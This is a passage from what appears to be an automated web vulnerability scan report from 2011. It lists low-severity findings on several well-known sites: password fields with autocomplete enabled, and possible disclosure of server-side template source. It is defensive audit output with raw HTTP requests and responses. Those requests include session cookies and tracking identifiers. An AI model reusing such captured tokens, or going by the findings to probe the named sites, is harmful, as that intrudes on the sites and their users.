Path:   /mobile/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /mobile/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.124.65
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:29 GMT
Content-Length: 18096

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/mobile\/index.php";window._EagleEyeSeed="ynVf";</script><
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

15.22. http://www.facebook.com/pages/create.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/create.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /pages/create.php?ref_type=sitefooter HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fadvertising%2F%3Fcampaign_id%3D402047449186%26placement%3Dpflo%26extra_1%3D0

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php%3Fref_type%3Dsitefooter; path=/; domain=.facebook.com
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.125.46
X-Cnection: close
Date: Tue, 19 Jul 2011 14:58:29 GMT
Content-Length: 32607

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/pages\/create.php";window._EagleEyeSeed="F3jP";</script><
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

15.23. http://www.facebook.com/privacy/explanation.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /privacy/explanation.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /privacy/explanation.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fprivacy%2Fexplanation.php; path=/; domain=.facebook.com
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.113.53
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:54 GMT
Content-Length: 28323

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/privacy\/explanation.php";window._EagleEyeSeed="O3Ue";</s
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

15.24. http://www.facebook.com/r.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /r.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /r.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?&show_faces=true&action=like&font=arial&layout=standard&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110719_0700%26ssh%3DS262080510%26FORM%3DHPFBLK%26mkt%3Den-US%26&width=400&height=80
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.108.49
X-Cnection: close
Date: Tue, 19 Jul 2011 14:58:57 GMT
Content-Length: 30768

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/r.php";window._EagleEyeSeed="TYhN";</script><noscript> <m
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

15.25. http://www.facebook.com/r.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /r.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /r.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?&show_faces=true&action=like&font=arial&layout=standard&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110719_0700%26ssh%3DS262080510%26FORM%3DHPFBLK%26mkt%3Den-US%26&width=400&height=80
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.108.49
X-Cnection: close
Date: Tue, 19 Jul 2011 14:58:57 GMT
Content-Length: 30768

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/r.php";window._EagleEyeSeed="TYhN";</script><noscript> <m
...[SNIP]...
<div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event)&#123;return false;&#125;.call(this,event)!==false &amp;&amp; Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" name="post_form_id" value="fedd9a47074e63aa1e84ddd49e2a5b8d" />
...[SNIP]...
<div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div>
...[SNIP]...

15.26. http://www.facebook.com/terms.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /terms.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /terms.php?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf; __utma=87286159.39218672.1311087479.1311087479.1311087479.1; __utmb=87286159.1.10.1311087479; __utmc=87286159; __utmz=87286159.1311087479.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wd=1065x723

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.101.65
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:54 GMT
Content-Length: 44962

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/terms.php";window._EagleEyeSeed="2lBU";</script><noscript
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

15.27. http://www.livedrive.com/SignupToLivedrive  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.livedrive.com
Path:   /SignupToLivedrive

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /SignupToLivedrive?market=US HTTP/1.1
Host: www.livedrive.com
Proxy-Connection: keep-alive
Referer: http://www.livedrive.com/ForHome/ProSuite
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tid=; ASP.NET_SessionId=q5aztuic5mnla0v34ds15w55; rotateProductNavPane=7; market=US; __utma=1.1954624592.1311078246.1311078246.1311078246.1; __utmb=1.2.10.1311078246; __utmc=1; __utmz=1.1311078246.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 2.0.50727
Set-Cookie: market=US; expires=Mon, 17-Oct-2011 12:23:33 GMT; path=/
X-Powered-By: ASP.NET
X-Served-By: 101
Date: Tue, 19 Jul 2011 12:23:33 GMT
Connection: close
Content-Length: 19197


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   
   Sign up for Livedrive
...[SNIP]...
</div>

       <form action="https://www.livedrive.com/SignupToLivedrive?market=US" method="post">


<div class="page-box-red">
...[SNIP]...
</label>
    <input id="Password" maxlength="255" name="Password" type="password" />


    <label for="Confirm">
...[SNIP]...
</label>
    <input id="Confirm" maxlength="255" name="Confirm" type="password" />
</fieldset>
...[SNIP]...

15.28. http://www.myspace.com/auth/loginform  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.myspace.com
Path:   /auth/loginform

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /auth/loginform?dest=http%3a%2f%2fwww.myspace.com%2fModules%2fPostTo%2fPages%2fdefault.aspx%3fl%3d3%26u%3dhttp%253A%252F%252Fwww.factset.com%252Fproducts%252Fprivateequity%26t%3dPrivate%2bEquity%252C%2bVenture%2bCapital%252C%2bOwnership%252C%2bM%2526A%252C%2bIdea%2bScreening%252C%2bReporting%2b%257C%2bFactSet%2bResearch%2bSystems%26c%3d%253Cp%253EPowered%2bby%2b%253Ca%2bhref%253D%2522http%253A%252F%252Fsharethis.com%2522%253EShareThis%253C%252Fa%253E%253C%252Fp%253E HTTP/1.1
Host: www.myspace.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634466573070107947&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==&UserFirstVisit=1; SessionDDF2=uVsidkC9gs9LxsRzCwBpAqNpUhZIkNkh4AxUscS1Wh/5D61/I2xWndq6Yq1d3SssDjs2CU1kxAVylC6iru8MRA==

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Server: 58f11280d72c42fc4512638736510b7130783a7e53b4cdad
X-AspNet-Version: 4.0.30319
Set-Cookie: MSCOUNTRY=US; domain=.myspace.com; expires=Tue, 26-Jul-2011 14:30:19 GMT; path=/
X-PoweredBy: Just our Will
Date: Tue, 19 Jul 2011 14:30:19 GMT
Content-Length: 11278
X-Vertical: globalsites

<!DOCTYPE html>
<html class="noJS en-US">
<!-- LoginForm -->
<head>
<script type="text/javascript">
   (function (wl, his) {var m = wl.href.match(/([?&]_escaped_fragment_=|#!(?=\/))([^&#]*)/);if (!
...[SNIP]...
</div>
   

<form action="https://www.myspace.com/auth/login" method="post" class="signin externalForm" >
<fieldset>
...[SNIP]...
</label>

<input type="password" id="passwordExternal" class="passwordInput" name="Password" tabindex="2" />
           
       </p>
...[SNIP]...

15.29. http://www.nne.aaa.com/en-nne/Pages/Home.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nne.aaa.com
Path:   /en-nne/Pages/Home.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en-nne/Pages/Home.aspx?zip=05672&referer=www.aaa.com HTTP/1.1
Host: www.nne.aaa.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route?rclub=36&rurl=http%3a%2f%2fwww.nne.aaa.com%2fen-nne%2fPages%2fHome.aspx
Cookie: zipcode=05672|AAA|36

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 19:04:25 GMT
Server: Microsoft-IIS/6.0
ACSC: WEB04
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: acezipcode=36|AAA|05672; expires=Thu, 19-Jul-2012 19:04:24 GMT; path=/
Cache-Control: private
Expires: Tue, 19 Jul 2011 19:07:25 GMT
Vary: *, Accept-Encoding, User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 97400


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:o="urn:schemas-microsoft-com:office:office" __expr-val-dir="ltr" dir="ltr">
<
...[SNIP]...
<body scroll="yes" onload="javascript:if (typeof(_spBodyOnLoadWrapper) != 'undefined') _spBodyOnLoadWrapper();" class="">
<form name="aspnetForm" method="post" action="Home.aspx?zip=05672&amp;referer=www.aaa.com" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
his.defaultValue) {this.value=''; this.className='txt txt-username black';}" onBlur="if(this.value=='') {this.value = this.defaultValue; this.className='txt txt-username grey';}"/>
<input type="password" id="Password1" name="Password" value="" class="txt txt-pwd bgimg" size="15" maxlength="30" onfocus="if (this.value.length == 0) {this.className='txt txt-pwd nobgimg'}; setEnd(this);" onBlur="if (this.value.length == 0) {this.className='txt txt-pwd bgimg';} else {this.className='txt txt-pwd nobgimg';}"/>
<input type="submit" name="ctl00$ctl21$g_3ed04e90_5b70_4221_9e62_3ca8a6b20628$ctl00$ButtonLoginH" value="LOGIN" onclick="javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBa
...[SNIP]...

16. Source code disclosure  previous  next
There are 7 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.


16.1. http://bing.fansnap.com/ejs_templates/seats_page/known_tooltip.ejs  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://bing.fansnap.com
Path:   /ejs_templates/seats_page/known_tooltip.ejs

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /ejs_templates/seats_page/known_tooltip.ejs?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4B2dJOHBjoLb2Zmc2V0af6QnQ%3D%3D--8a1ac49a36095f4dbcf7a97d829c4d094b2f91ed

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:04 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 13 Sep 2010 17:59:33 GMT
ETag: "27341ca-2e1-dbd2eb40"
Accept-Ranges: bytes
Content-Length: 737
Connection: close
Content-Type: text/plain; charset=UTF-8

<div class="vfs-tooltip">
<div class="vfs-tooltip-img">
<% switch(format) {
case 'none':
var src = '/images/rollover-no-vfs.png';
break;
case 'default':
var src = imgPath;
break;
default:
var src = '/images/loadingnew.gif';
}
%>

<%= img_tag(src, "View from seat") %>
</div>
...[SNIP]...
<strong><%= section %></strong>
<% if (row) { %>
<strong>- <%= row %></strong>
...[SNIP]...
<div class="vfs-det-ticks">
<%=seats%> from $<%=price%>
</div>
...[SNIP]...

16.2. http://bing.fansnap.com/ejs_templates/seats_page/ticket_sets/new_base/marker/photo_sec_none.ejs  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://bing.fansnap.com
Path:   /ejs_templates/seats_page/ticket_sets/new_base/marker/photo_sec_none.ejs

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /ejs_templates/seats_page/ticket_sets/new_base/marker/photo_sec_none.ejs?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
